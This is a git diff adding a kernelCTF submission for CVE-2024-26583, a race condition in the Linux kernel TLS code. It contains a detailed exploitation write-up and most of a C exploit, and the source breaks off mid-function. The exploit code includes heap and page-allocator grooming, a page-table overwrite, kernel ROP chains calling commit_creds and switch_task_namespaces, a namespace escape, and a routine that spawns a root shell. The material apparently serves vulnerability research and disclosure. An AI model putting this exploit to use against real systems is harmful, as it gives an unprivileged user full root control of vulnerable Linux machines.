diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/exploit.md new file mode 100644 index 000000000..a8dad7701 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/exploit.md @@ -0,0 +1,342 @@ +## Setup + +To trigger the TLS encryption we must first configure the socket. +This is done using the setsockopt() with SOL_TLS option: + +``` + static struct tls12_crypto_info_aes_ccm_128 crypto_info; + crypto_info.info.version = TLS_1_2_VERSION; + crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128; + + if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0) + err(1, "TLS_TX"); + +``` + +This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase. + +In KernelCTF config PCRYPT (parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (software async crypto daemon). + +Each crypto operation needed for TLS is usually implemented by multiple drivers. +For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue). + +Available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. Crypto API supports loading additional modules on demand. + +As seen in the code snippet above we don't have direct control over which crypto drivers are going to be used in our TLS encryption. +Drivers are selected automatically by Crypto API based on the priority field which is calculated internally to try to choose the "best" driver. + +By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations. + +However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver. + +The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations. + +Following code causes AES CCM encryption selected for TLS to be handled by cryptd: + +``` + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", + .salg_name = "cryptd(ctr(aes-generic))" + }; + int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0); + + if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + struct sockaddr_alg sa2 = { + .salg_family = AF_ALG, + .salg_type = "aead", + .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))" + }; + + if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0) + err(1, "af_alg bind"); +``` + +## What we start with and what can we do + +If we win the race condition, vulnerability gives us a limited write primitive. +To be exact, it gives us an ability to change a 8 bit integer value of '1' to '0' at an offset 0x9c in the struct tls_sw_context_rx object which is allocated from a general kmalloc-256 cache. + +The big problem is finding a victim object in which this limited write gives us the ability to escalate privileges or at least get a better exploitation primitive. + +In the case of 5.15 kernel we were able to find an object with a refcount-like field that we were able to modify to turn the vulnerability into a use-after-free, but it proved impossible for 6.1. + +Instead, we used a variant of the Dirty PageTable technique. The usual situation with this technique is that we have full write access to the page table entry through a use-after-free and we can arbitrarily modify the PFN to point the PTE to a physical page belonging to e.g. kernel code we want to patch. + +Here we have more limitations, but the basic idea is the same. + +The x86_64 page table takes 0x1000 bytes and consists of 512 8 byte entries. +It means that if we manage to allocate a page table in place of the tls_sw_context_rx, we will be able to modify a byte at offset 0x4 of the PTE starting at offset 0x90. +This offset points at the PFN part of the PTE (PFN is encoded in bits 12 to 52 of the PTE). This byte of the PFN has to have a value of 0x01 for us to be able to change to 0x00. + +KernelCTF setup has 3.5 GB of physical memory which translates to 0xe0000 of physical pages, so PFNs should go from 0 to 0xe0000, but there are holes for PCI devices etc, so in practice the last PFN is around 0x11b200. + +Here's what an example PTE looks for that last PFN: +0x800000011b200867 + +The 5th byte is 0x01 which is ideal for our write primitive. +If we change it to 0x00, the entry will now point at PFN 0x1b200 instead of 0x11b200. +We can do the same with any PFN >= 0x100000 + +This is very promising, but we have to solve several issues to be able to get to privilege escalation: + +- we have to remap a page table in place of the tls context. Page tables are allocated straight from the buddy allocator, so the physical page of the kmalloc-256 slab has to be first discarded. +- this page table must map to physical memory with PFN >= 0x100000 +- we have to place some useful objects to write to after our PTE modification at PFN-of-modified-pte - 0x100000 +- these steps have to be pretty reliable, because the hard to hit race condition gives us a limited chance of success from the start - if the next stage works only e.g. 10% of time, the vulnerability could become hard to exploit in real conditions, especially if a failed attempt crashes the kernel. + +## Preparing memory allocations + +### "High" memory + +We have to ensure that the new page table allocated to replace the tls context will have PFNs >= 0x100000. This value is actually important for Linux memory management - physical memory on x86_64 is split in multiple zones. +Zone DMA32 contains memory under 4 GB (PFNs < 0x100000) and zone Normal memory above this limit. Physical page allocation is pretty predictable when allocating a lot of memory - first systems tries to use zone Normal, until its empty and then move to DMA32. + +To improve the reliability of the exploit, we map a lot of "Normal" memory at the very beginning (g_high_mem in the exploit code) and release chunks of it before allocating our new user memory that will get its PTE modified (g_victim_mem). + +### "Low" memory + +We also need to make sure that memory that our modified PTE will point to will contain a kernel object that can be used for privilege escalation. +This is pretty simple, we just create a lot of xattr objects until the memory is almost full. +For performance xattrs are split into multiple fds and stored in g_low_xattr_fds array for later use. + +## Triggering use-after-free through race condition + +``` + spin_lock_bh(&ctx->decrypt_compl_lock); + if (!atomic_dec_return(&ctx->decrypt_pending)) +[1] complete(&ctx->async_wait.completion); +[2] spin_unlock_bh(&ctx->decrypt_compl_lock); +} +``` + +To exploit the race condition we have to hit window between lines [1] and [2] and perform following actions: +1. Close the socket to free tls context (struct tls_sw_context_rx), leading to discard of the slab page +2. Allocate a new page table in place of the tls context. + +To hit this small window and extend it enough to fit our allocations we turn to a well-known timerfd technique invented by Jann Horn. +The basic idea is to set hrtimer based timerfd to trigger a timer interrupt during our race window and attach a lot (as many as RLIMIT_NOFILE allows) of epoll watches to this timerfd to make the time needed to handle the interrupt longer. +For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html). + +Exploitation is done in 2 threads - main process runs on CPU 0, and a new thread (child_recv()) is cloned for each attempt and bound to CPU 1 + +| CPU 0 | CPU 1 | +| -------- | -------- | +| allocate tls context | - | +| - | exploit calls recv() triggering async crypto ops | +| - | tls_sw_recvmsg() waits on completion | +| - | cryptd calls tls_decrypt_done() | +| - | tls_decryption_done() finishes complete() call | +| - | timer interrupts tls_decrypt_done() | +| recv() returns to userspace unlocking the socket | timerfd code goes through all epoll notifications | +| exploit calls close() to free tls context | ... | +| exploit allocates a page table in place of tls context| ... | +| - | interrupt finishes and returns control to tls_decrypt_done() | +| - | spin_unlock_bh() writes to PTE | + + +## Ensuring the slab page is discarded + +struct tls_sw_context_rx is allocated from kmalloc-256. This cache uses a single page slab storing 16 objects. +To ensure the slab page is discarded we have to meet the same requirements as in a cross-cache attack: + +- all objects in the same slab as tls_sw_context_rx must be freed. All neighbouring objects are xattrs from the same kmalloc-256 cache and are freed before starting the race condition, which freezes the slab and puts it on a per cpu partial list +- per cpu partial list must be full to unfreeze the slab after tls context is freed +- per node partial list must also be full for the slab to be discarded instead of moved to the per node list + +All these requirements are met before tls context is freed by freeing enough kmalloc-256 xattrs. + +## Checking for success + +If PTE modification is successful, our user memory will point to the physical memory of simple_xattr objects that have data under our control inside, so we just have to loop through mmapped area to look for a pattern (here 0x4242424242424242) - if this is found, first stage of exploitation is successful and we move to the second stage implemented in stage2() function. +The physical memory is now mapped both under our user virtual address return by mmap (g_victim_mem) and in kernel space for xattr objects. + + +## Second stage + +The xattr structure looks like this on 6.1: + +``` +struct simple_xattr { + struct list_head list; /* 0 0x10 */ + char * name; /* 0x10 0x8 */ + size_t size; /* 0x18 0x8 */ + char value[]; /* 0x20 0 */ +``` + +We now have read/write access to every field of it and we have to use it to get a root shell. + +For a start, we get a free heap leak from prev/next and name pointers, but unfortunately no function pointers. + +There are many possible approaches to get code execution, here we decided to use the name pointer for creating an arbitrary free primitive - when xattr is removed, kfree() is called on the name. + +We will use it to create a use-after-free on a struct key_restriction object: +``` +struct key_restriction { + key_restrict_link_func_t check; /* 0 0x8 */ + struct key * key; /* 0x8 0x8 */ + struct key_type * keytype; /* 0x10 0x8 */ +}; +``` + +This object is used after KEYCTL_RESTRING_KEYRING operation and the 'check' function pointer will be called when attempting to add a new key to a restricted keyring. + +To do this we have to know two things: +- heap address of the key_restriction object +- kernel text base (we could have leaked it externally with a side-channel, but it's not that hard to leak it from memory and have a self-contained exploit) + +### Leaking info + +To leak more data we just have to replace some of the xattrs in our memory with different object. +Specifically we would like to have access to struct key - it has a pointer to the key_restriction object and key type pointer to gives us a kernel text leak. + +``` +struct key { +... + union { + struct keyring_index_key index_key; /* 0x88 0x28 */ + struct { + long unsigned int hash; /* 0x88 0x8 */ + long unsigned int len_desc; /* 0x90 0x8 */ + struct key_type * type; /* 0x98 0x8 */ + struct key_tag * domain_tag; /* 0xa0 0x8 */ + char * description; /* 0xa8 0x8 */ + }; /* 0x88 0x28 */ + }; +... + struct key_restriction * restrict_link; /* 0xd0 0x8 */ +}; +``` + +### Allocating key object + +Unfortunately, key objects are allocated from a dedicated cache (key_jar, single page slab, 16 objects per slab), so we have to perform a cross-cache attack. +To make matters worse, to allocate "low" memory we used large xattrs from kmalloc-4k which had 8 page slabs (order 3), so we can't expect to simply get the recently freed page from the PCP. +To stay with order 0 pages we would have to limit xattrs to 256 bytes and this would slow down the allocation phase of the exploit too much. + +#### Discarding the xattrs page + +To discard the slab page we have to perform the same steps as we did with freeing tls context. +This puts at least one order 3 page in the PCP. + + +### Moving the page from PCP to buddy allocator + +To move pages from PCP we have to free enough pages to exceed the upper limit of the given PCP cache ('high' value). Each time this limit is exceeded on page free PCP will move a batch of existing pages to the buddy allocator. + +Fortunately we don't have to guess how many pages need to be freed. Page allocator state is exposed in /proc/zoneinfo (this file is world-readable). + +Here's an example of the part describing PCP status of zone DMA32 on CPU 1: +``` + cpu: 1 + count: 185 + high: 9096 + batch: 63 +``` + +We now know that we need to free 8911 pages to move a batch of 63 to the buddy allocator. +This zoneinfo file is parsed in the exploit (get_pagecount() function) to get real-time info on the page allocator state. + +The process of moving pages from PCP to buddy allocator takes place in the free_pcppages_bulk() function and starts with pages of the order that triggered the flush, then moves in a round robin fashion over other orders until. +Pages in free_pcpages_bulk() are taken from the tail of the list, so pages last freed will be the last to be moved. + +In the exploit function prepare_pcp() allocates enough of an order 3 pages to be able trigger the flush, then after discarding the victim page frees them all in flush_pcp(). + +### Reusing order 3 pages from the buddy allocator for key_jar + +The next issue is getting our order 3 page when requesting order 0 page for the key_jar. +This would be quite simple if we could allocate as many keys as we want - first allocation will use order 0 PCP pages, then buddy allocator pages in increasing order until we eventually get to the page we want. + +Unfortunately, we are severely limited in the number of keys we can allocate - the limit is 200 keys with 20000 bytes total, so we would be able to allocate at most 12 pages in the best case scenario, but probably less. + +We could try draining the PCP based on the info from /page/zoneinfo and draining order 0, 1 and 2 from buddy allocator, but reliability would probably be less than optimal, and we need this part of the exploit to be very reliable. + +So, instead we add another step - allocate an object that also uses order 0 pages, but there are no limits on its creation. + +For this we use netlink allocation primitive - when a netlink message with size > 0x1000 is sent, the buffer for the message is allocated through vmalloc, which internally allocates order 0 physical pages. + +When allocating through netlink, we mark each page with a different pattern and then read memory to figure out which netlink buffer was allocated in our user victim area. + +Then we can free only one netlink buffer, which will free 2 physical pages - that many we can easily allocate within the key limits that we have. + +Before the target netlink buffer is freed, we do some additional operations to increase stability. + +1. Allocate some keys in get_fresh_slabs() to fill potential holes in existing partial key_jar slabs +2. Ensure we have a fresh empty kmalloc-192 slab. Kmalloc-192 is used when creating a new key and if it needs to allocate a new slab it could take our target slab that we need for the key object itself. + +This second operation uses get_pagecount() (parsing of the /proc/zoneinfo) to discover when exactly the new slab is allocated. + +The next step is to free the selected netlink buffer. We have to remember that 2 pages are freed. +If we have detected that the first page was our target, this means it will be the second page allocated from PCP (LIFO). +To improve our chances once more, we try to get rid of this first extra page. +This is done in drain_pcp_order0() with the help of get_pagecount() to detect when exactly the new page is allocated (we use xattrs for allocation, so it would be impossible to determine current slab state otherwise). + +Finally, we alloc new keys of the keyring type (only this type uses the link restriction mechanism). + +### Finding keys in memory and leaking kernel base + +We know that a key has a pointer to the key type struct located in the kernel text section and the last 12 bits of this address are fixed, so we use it to find the key in our memory and at the same time figure out the base kernel address. + + +### Leaking location of the key_restriction object + +We use keyctl with a KEYCTL_RESTRICT_KEYRING to allocate a key_restriction object and we read it from our key object (which we already know the location of). + +### Triggering kfree() on the key_restriction object + +Now we replace the name pointer of the simple_xattr under our control and call unlink() on the associated file to trigger removal of all xattrs. +unlink() is used because removal with fremovexattr() requires us to know the name of the xattr and this name consists of the content of the key_restriction object. + +Now we can easily allocate our fake key_restriction object using the xattr primitive once more. + +### Getting RIP control + +All we need to do is try to add a new key to our restricted keyring and the check function will be called giving us RIP control. + +### Pivot to ROP + +Call to key restriction check function looks like this: +``` + return keyring->restrict_link->check(keyring, key->type, &key->payload, + keyring->restrict_link->key); +``` + +The fourth argument (RCX) is under our direct control, as we recently performed use-after-free on the key_restriction object. +Now we have to place our ROP under a known address that we will place at restrict_link->key. +For this, we can use a leak from xattr next pointer. +All xattrs were freed and we can now reallocate them with our ROP payload. One of them will be placed at the previously leaked pointer. + +Then we can pass control to the ROP chain using only 3 gadgets: + +``` +mov rax, qword ptr [rcx + 8] +test rax, rax +je 0xffffffff812bbdcf +mov rsi, qword ptr [rcx] +lea rdi, [rbp - 0x10] +mov rdx, r14 +call __x86_indirect_thunk_rax +``` + +``` +push rsi +jmp QWORD PTR [rsi+0x39] +``` + +and finally + +``` +pop rsp +ret +``` + +## Second pivot + +At this point we have full ROP and enough space available, but our standard privilege escalation payload relies on ROP being at a known location, so we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area. +Then we use a `pop rsp ; ret` gadget to pivot there. + +## Privilege escalation + +The execution is happening in the context of a syscall this time, so it's easy to escalate privileges with standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and return to the root shell. diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/novel-techniques.md new file mode 100644 index 000000000..e69de29bb diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/vulnerability.md new file mode 100644 index 000000000..0fb28fd57 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/vulnerability.md @@ -0,0 +1,49 @@ +## Requirements to trigger the vulnerability + +- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD] +- User namespaces required: no + +## Commit which introduced the vulnerability + +https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0cada33241d9de205522e3858b18e506ca5cce2c + +## Commit which fixed the vulnerability + +https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=aec7961916f3f9e88766e2688992da6980f11b8d + +## Affected kernel versions + +Introduced in 4.20. Fixed in 6.1.78, 5.15.159 and other stable trees. + +## Affected component, subsystem + +net/tls + +## Description + +TLS decryption works by calling recvmsg() on a TLS configured socket. +This will retrieve an encrypted message from the network stack and perform decryption. +AEAD decryption work is submitted to the crypto subsystem in tls_do_decryption(), setting tls_decrypt_done() as a callback and calling crypto_aead_decrypt(). + +If decryption is done asynchronously, crypto_aead_decrypt() returns immediately with EINPROGRESS value instead of waiting. +Execution then returns to tls_sw_recvmsg() which waits for the async crypto operations to be done using a completion mechanism. + +When decryption is finished, the crypto subsystem calls tls_decrypt_done() callback function, which calls complete() allowing tls_sw_recvmsg() to exit. When recvmsg() returns, the socket is no longer locked and it is now possible to close it, which causes all associated objects to be freed. + +Relevant tls_decrypt_done() code: + +``` +... + spin_lock_bh(&ctx->decrypt_compl_lock); + if (!atomic_dec_return(&ctx->decrypt_pending)) +[1] complete(&ctx->async_wait.completion); +[2] spin_unlock_bh(&ctx->decrypt_compl_lock); +} + +``` + +The bug is a race condition - calling complete at [1] allows the socket to be closed, which causes the ctx object to be freed, but ctx is later used as an argument to spin_unlock_bh() + +If an attacker manages to close the socket and reallocate freed ctx with controlled data between points [1] and [2], he can manipulate memory using spin_unlock_bh(). + +This is a very limited write primitive, as it only allows changing an 8 bit integer value of 1 to 0 at a fixed position in memory (spinlock is basically a 32 bit unsigned integer with the least significant byte used for the actual lock value). diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/Makefile b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/Makefile new file mode 100644 index 000000000..5e01df06e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/Makefile @@ -0,0 +1,9 @@ +INCLUDES = +LIBS = -pthread -ldl +CFLAGS = -fomit-frame-pointer -static -fcf-protection=none + +exploit: exploit.c kernelver_6.1.74.h + gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS) + +prerequisites: + sudo apt-get install libkeyutils-dev diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit new file mode 100755 index 000000000..88b84175d Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit.c b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit.c new file mode 100644 index 000000000..ab6068c0d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit.c @@ -0,0 +1,1236 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "kernelver_6.1.74.h" + +static char *g_mmapped_buf; +static uint64_t g_kernel_text; +static int g_debug; +static int g_event1; +static int g_sender_sock; + +void set_cpu(int cpu) +{ + cpu_set_t cpus; + CPU_ZERO(&cpus); + CPU_SET(cpu, &cpus); + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus) < 0) { + perror("setaffinity"); + exit(1); + } +} + +void set_cpu_all() +{ + cpu_set_t cpus; + CPU_ZERO(&cpus); + for (int i = 0; i < 4; i++) + { + CPU_SET(i, &cpus); + } + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus) < 0) { + perror("setaffinity"); + exit(1); + } +} + +void get_kctf_flag() +{ + char buf[512]; + + + int fd = open("/flag", O_RDONLY); + + if (fd < 0) + return; + + size_t n = read(fd, buf, sizeof(buf)); + if (n > 0) { + printf("Flag:\n"); + + write(1, buf, n); + + printf("\n"); + } + + close(fd); +} + +static char *g_sh_argv[] = {"sh", NULL}; + +static int g_status; + +#define MMAP_SIZE 0x20000 +#define XATTR_HEAD_SIZE 0x20 +#define KEY_HEAD_SIZE 0x18 + +static int g_pwned; +static char *g_rop2; +static size_t g_rop2_len; + +#define ROP2_CONST_AREA 0x10 +#define ROP2_CONST_OFFSET 0x200 + +uint64_t kaddr(uint64_t addr) +{ + return g_kernel_text + addr - 0xffffffff81000000uL; +} + + +void __attribute__((naked)) after_pwn() +{ +// Fix user stack and recover eflags since we didn't do when returning from kernel mode + asm volatile( + "mov %0, %%rsp\n" + :: "r" (g_mmapped_buf + MMAP_SIZE - 0x100) + ); + + g_pwned = 1; + + + set_cpu(1); + + int pid = fork(); + + if (!pid) { + + if (setns(open("/proc/1/ns/mnt", O_RDONLY), 0) < 0) + perror("setns"); + + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + printf("\nGot root!!!\n"); + printf("Getting kctf flags ...\n"); + + get_kctf_flag(); + + printf("Launching shell, system will crash when you exit because I didn't bother with recovery ...\n"); + execve("/bin/sh", g_sh_argv, NULL); + _exit(0); + } + + waitpid(pid, &g_status, 0); + + + + printf("Shell exited, sleeping for 30 seconds, after that system might crash\n"); + + sleep(30); + _exit(0); +} + + +void rop_rax2rdi(uint64_t **rop_p) +{ + uint64_t *rop = *rop_p; + + *(uint64_t *) (g_rop2+ROP2_CONST_OFFSET) = kaddr(POP_RDI); // RCX == RW_BUFFER + +// rax -> rdi + *rop++ = kaddr(POP_RCX); + *rop++ = kaddr(RW_BUFFER+ROP2_CONST_OFFSET); + *rop++ = kaddr(PUSH_RAX_JMP_QWORD_RCX); + + *rop_p = rop; +} + +size_t prepare_rop2(uint64_t *rop2) +{ + uint64_t *rop2_start = rop2; + + + *rop2++ = kaddr(POP_RDI); + *rop2++ = kaddr(INIT_CRED); + *rop2++ = kaddr(COMMIT_CREDS); + *rop2++ = kaddr(AUDIT_SYSCALL_EXIT); + + // Namespace escape based on code by Crusaders of Rust + *rop2++ = kaddr(POP_RDI); + *rop2++ = 1; + *rop2++ = kaddr(FIND_TASK_BY_VPID); + + rop_rax2rdi(&rop2); // clobbers RCX + + *rop2++ = kaddr(POP_RSI); + *rop2++ = kaddr(INIT_NSPROXY); + + *rop2++ = kaddr(SWITCH_TASK_NAMESPACES); + + *rop2++ = kaddr(POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX); +// eflags + *rop2++ = 0; + rop2 += 6; + +// Userspace RIP + *rop2++ = (uint64_t) after_pwn; + + *rop2++ = kaddr(RETURN_VIA_SYSRET); + + return (char *) rop2 - (char *) rop2_start; +} + +void prepare_rop(char *buf, uint64_t kern_addr) +{ + uint64_t g2 = kaddr(PUSH_RSI_JMP_QWORD_RSI_039); + + uint64_t *rop = (uint64_t *) (buf + 0x10); + + *(uint64_t *) (buf) = kern_addr + 0x10; + *(uint64_t *) (buf+8) = g2; + + *(uint64_t *) (buf + 0x10 + 0x39) = kaddr(POP_RSP); + + *rop++ = kaddr(POP_RDI_RSI_RDX_RCX); + + *rop++ = kaddr(RW_BUFFER); + *rop++ = (uint64_t) g_rop2; + *rop++ = ROP2_CONST_OFFSET + ROP2_CONST_AREA; + *rop++ = 0; + + *rop++ = kaddr(COPY_USER_GENERIC_STRING); + +// jump over 0x39 + *rop++ = kaddr(POP_RSI_RDI); + rop += 2; + + *rop++ = kaddr(POP_RSP); + *rop++ = kaddr(RW_BUFFER); +} + + +int alloc_xattr_fd_attr(int fd, char *attr, size_t size, void *buf) +{ + int res = fsetxattr(fd, attr, buf, size - XATTR_HEAD_SIZE, XATTR_CREATE); + if (res < 0) { + err(1, "fsetxattr"); + } + + return fd; +} + +int alloc_xattr_fd(int fd, unsigned int id, size_t size, void *buf) +{ + static char attr[512]; + + snprintf(attr, sizeof(attr), "security.%d", id); + alloc_xattr_fd_attr(fd, attr, size, buf); + + return fd; +} + +void free_xattr_fd(int fd, int id) +{ + static char attr[512]; + + snprintf(attr, sizeof(attr), "security.%d", id); + + fremovexattr(fd, attr); +} + + +ssize_t read_xattr_fd(int fd, int id, char *buf, size_t sz) +{ + static char attr[512]; + + snprintf(attr, sizeof(attr), "security.%d", id); + + ssize_t ret = fgetxattr(fd, attr, buf, sz); + + if (ret < 0) + err(1, "read_xattr_fd"); + + return ret; +} + + +#define DUP_CNT 1300 +#define EPOLL_CNT 590 + +int epoll_fds[EPOLL_CNT]; +int tfd_dups[DUP_CNT]; +static int event1; + +#define MAX_ATTEMPTS 30 +#define HIGH_MEM_CHUNK 0x1000*1500 +#define HIGH_MEM_SIZE HIGH_MEM_CHUNK*MAX_ATTEMPTS +#define PG_ALLOC_SIZE 0x200000 +#define HIGH_XATTR_CNT 0 +#define XATTR_CHUNK 100 +#define LOW_XATTR_CNT 120000 +#define XATTR_SLAB_CNT 8 +#define KEY_SLAB_CNT 16 +#define SLAB_CNT 16 +#define PARTIAL_CNT SLAB_CNT*12 +#define NEIGH_CNT SLAB_CNT*3-1 +#define PCP_MMAP_PAGES 12000 +#define NETLINK_CNT 100 +#define KEY_CNT KEY_SLAB_CNT*10 +#define KEY2_CNT 199-KEY_CNT + +char *g_high_mem; +char *g_victim_mem; +int g_low_xattr_fds[LOW_XATTR_CNT]; + +static unsigned int g_low_xattr_cnt; + +void create_watches(int fd) +{ + for (int i=0; itv_nsec += usecs * 1000; + + if (ts->tv_nsec >= NSEC_PER_SEC) { + ts->tv_sec++; + ts->tv_nsec -= NSEC_PER_SEC; + } +} + + +char *g_stack1; +char *g_stack2; + +struct child_arg { + int tfd; + int sock; + int delay; + int try; +}; + +int child_recv(void *arg) +{ + struct itimerspec its = { 0 }; + struct child_arg *carg = (struct child_arg *) arg; + + set_cpu(1); + + ts_add(&its.it_value, carg->delay); + + eventfd_write(g_event1, 1); + + timerfd_settime(carg->tfd, 0, &its, NULL); + set_cpu_all(); + + char recv_buf[256]; + memset(recv_buf, 'A', sizeof(recv_buf)); + int ret = recv(carg->sock, recv_buf, 10, 0); + + if (ret < 0) + perror("recv"); + + sleep(10000); + + return 0; +} + +#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */ +#define NETLINK_CNT1 800 +static int netlink_socks[NETLINK_CNT1]; + +void setup_tls(int sock, int is_rx) +{ + if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0) + err(1, "setsockopt"); + + static struct tls12_crypto_info_aes_ccm_128 crypto_info = {.info.version = TLS_1_2_VERSION, .info.cipher_type = TLS_CIPHER_AES_CCM_128}; + + if (setsockopt(sock, SOL_TLS, is_rx ? TLS_RX : TLS_TX, &crypto_info, sizeof(crypto_info)) < 0) + err(1, "TLS_TX"); +} + +void sig_handler(int sig, siginfo_t *info, void *ucontext) +{ + printf("Got signal %d from pid %d\n", sig, info->si_pid); +} + +int sender(void *a) +{ + g_sender_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + struct sockaddr_in addr; + memset(&addr, 0, sizeof(addr)); + + if (g_sender_sock < 0) + err(1, "sender socket"); + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(7777); + + if (connect(g_sender_sock, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + + setup_tls(g_sender_sock, 0); + + char buf[256]; + memset(buf, 'B', sizeof(buf)); + int ret = send(g_sender_sock, buf, 100, 0); + sleep(10000); + exit(0); +} + +key_serial_t alloc_key(int id, size_t len, char *buf) +{ + key_serial_t serial; + char desc[256]; + len -= KEY_HEAD_SIZE; + + snprintf(desc, sizeof(desc), "%d", id); + + serial = syscall(SYS_add_key, "user", desc, buf, len, KEY_SPEC_PROCESS_KEYRING); + + if (serial < 0) { + err(1, "key add"); + } + + return serial; +} + +key_serial_t alloc_keyring(int id) +{ + key_serial_t serial; + char desc[512]; + + memset(desc, ' ', 256); + + snprintf(desc, sizeof(desc), "%d", id); + + serial = syscall(SYS_add_key, "keyring", desc, NULL, 0, KEY_SPEC_PROCESS_KEYRING); + + if (serial < 0) { + err(1, "keyring add"); + } + + return serial; +} + +int prepare_netlink_listener(unsigned int port_id) +{ + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_USERSOCK); + if (sock == -1) { + err(1, "socket netlink\n"); + } + struct sockaddr_nl addr; + memset(&addr, 0, sizeof(addr)); + addr.nl_family = AF_NETLINK; + addr.nl_pid = port_id; + if (bind(sock, (struct sockaddr*)&addr, sizeof(addr))) + err(1, "bind netlink fail\n"); + + return sock; +} + +int g_netlinks[NETLINK_CNT]; +int g_netlinks_send[NETLINK_CNT]; + +void free_netlink(int sock) +{ + recv(sock, g_mmapped_buf, MMAP_SIZE, 0); +} + +void prepare_netlinks() +{ + unsigned int port_id = 0x6666; + for (int i = 0; i < NETLINK_CNT; i++) + { + g_netlinks[i] = prepare_netlink_listener(port_id + i); + + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_USERSOCK); + if (sock == -1) { + err(1, "socket netlink\n"); + } + + g_netlinks_send[i] = sock; + } +} + +int alloc_netlink(unsigned int idx, size_t len, char *buf) +{ + struct sockaddr_nl addr; + memset(&addr, 0, sizeof(addr)); + addr.nl_family = AF_NETLINK; + addr.nl_pid = 0x6666 + idx; + + ssize_t n = sendto(g_netlinks_send[idx], buf, len - 0x140, MSG_DONTWAIT, (struct sockaddr*)&addr, sizeof(addr)); + + if (n < 0) + err(1, "sendto netlink\n"); + + return g_netlinks[idx]; +} + +unsigned int parse_zoneinfo(char *buf, unsigned int *high, unsigned int *batch) +{ + char *t; + + t = strstr(buf, "zone DMA32"); + t = strstr(t, "cpu: 1"); + t = strstr(t, "count: "); + + unsigned int cnt = atoi(t+7); + + if (high) { + t = strstr(t, "high: "); + *high = atoi(t+6); + } + + if (batch) { + t = strstr(t, "batch: "); + *batch = atoi(t+7); + } + + return cnt; + +} + +unsigned int get_pagecount(unsigned int *high, unsigned int *batch) +{ + static char zibuf[10000]; + static int fdzi = -1; + + if (fdzi < 0) { + fdzi = open("/proc/zoneinfo", 0, O_DIRECT); + if (fdzi < 0) + err(1, "open zoneinfo"); + } + + lseek(fdzi, SEEK_SET, 0); + read(fdzi, zibuf, sizeof(zibuf)); + + return parse_zoneinfo(zibuf, high, batch); +} + +struct list_head { + struct list_head * next; /* 0 0x8 */ + struct list_head * prev; /* 0x8 0x8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct simple_xattr { + struct list_head list; /* 0 0x10 */ + char * name; /* 0x10 0x8 */ + size_t size; /* 0x18 0x8 */ + char value[]; /* 0x20 0 */ +}; + +unsigned int find_netlink(char *mem, size_t mem_size, unsigned int *which_subpage) +{ 